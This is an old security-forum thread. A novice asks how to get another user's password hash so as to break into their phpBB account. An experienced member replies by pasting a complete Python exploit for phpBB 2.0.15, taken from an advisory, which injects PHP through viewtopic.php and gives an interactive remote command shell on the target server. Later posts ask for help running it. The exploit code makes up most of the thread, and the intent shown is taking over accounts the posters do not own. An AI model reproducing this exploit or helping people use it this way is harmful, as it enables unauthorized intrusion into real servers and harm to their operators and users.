 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 106
 Members: 0
 Total: 106
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
phpbb 2.0.13 md5 hash...how to get? |
|
 Posted: Mon Sep 12, 2005 9:57 pm |
 |
|
| britshick |
| Beginner |
 |
|
| Joined: Sep 13, 2005 |
| Posts: 2 |
|
|
|
 |
|
 |
|
alright, I'm brand new to hacking phpbb(my first day) and I'm trying to hack into an account on a phpBB 2.0.13 board.
I used waraxe's tutorial it was very good and understandable and I was able to log onto my own account through my friend's computer useing that method, but only b/c I figured out where to get my own md5 hash. but what I can't figure out is how to get the target's hash...
sorry if this a completely noob question but I've seriously been looking for hours and can't find anything that tells me how to (I am very ADD so I may have read it but it just didn't register  )
so how do I "Get target password's md5 hash"? for phpbb 2.0.13...
is getting a copy of the database and looking it up the only way to get it? |
|
|
|
|
|
|
|
|
| Posted: Tue Sep 13, 2005 11:47 am |
|
|
| Chb |
| Valuable expert |
 |
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
Here is an exploit for phpBB 2.0.15. If you don?t know how to use: learn. 
| Code: | The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
phpBB Remote PHP Code Execution (viewtopic.php 2)
"phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package".
The following exploit code utilizes a vulnerability in phpBB to cause phpBB to execute arbitrary code.
Vulnerable Systems:
* phpBB version 2.0.15
#!/usr/bin/pyth0n
#
################################ this exploit for
# phpBB 2.0.15
print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
print " 2005 by rattle@awarenetwork.org" # rather than
print " well, just because there is none." # sending a single
# command.
import sys ##
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus
INITTAG = '<g0>'
ENDTAG = '</g0>'
def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()
if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''
url = urlunparse(url)
if url[-1] != '/': url += '/'
topic = quote_plus((sys.argv[2]))
while 1:
try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]
if (cmd == "exit"): break
else: cmd = makecmd(cmd)
out = _ex % (url,topic,cmd)
try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass
else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;
print "EXPLOIT FAILED"
except:
continue
Additional Information:
The information has been provided by rattle.
The original article can be found at: http://www.milw0rm.com/id.php?id=1076
================================================================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: html-list-unsubscribe@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: html-list-subscribe@securiteam.com
================================================================================
================================================================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. |
|
|
|
|
|
|
|
|
|
| Posted: Tue Sep 13, 2005 12:37 pm |
|
|
| britshick |
| Beginner |
|
|
| Joined: Sep 13, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
 looks like i've got a lot of learning to do.
thanks! |
|
|
|
|
| Posted: Thu Sep 29, 2005 11:41 pm |
|
|
| Dangerous |
| Beginner |
|
|
| Joined: Sep 30, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| Can I get a little help running this? |
|
|
|
|
| Posted: Sat Oct 01, 2005 6:03 am |
|
|
| Matt |
| Regular user |
|
|
| Joined: Jul 30, 2005 |
| Posts: 7 |
|
|
|
|
|
|
|
Hey
I know how to save it as a perl script.
I have a website that is perl enabled.
I tried uploading the script and running it, but I always get this server error thing.
I usually get that with php scripts when the directory is chmod to 777, but the dir had a chmod of 555 I think
It was fine.
It says the dir to perl is /usr/bin/perl
but i dont have that directory on my server.
Whats going on?
thx
-Matt |
|
|
|
|
|
|
|
|
| Posted: Sat Oct 01, 2005 10:14 am |
|
|
| Chb |
| Valuable expert |
|
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
| Matt wrote: | Hey
I know how to save it as a perl script.
I have a website that is perl enabled.
I tried uploading the script and running it, but I always get this server error thing.
I usually get that with php scripts when the directory is chmod to 777, but the dir had a chmod of 555 I think
It was fine.
It says the dir to perl is /usr/bin/perl
but i dont have that directory on my server.
Whats going on?
thx
-Matt |
Matt, it isn't a perl script! It's a python script so install python on your computer and try again.  |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
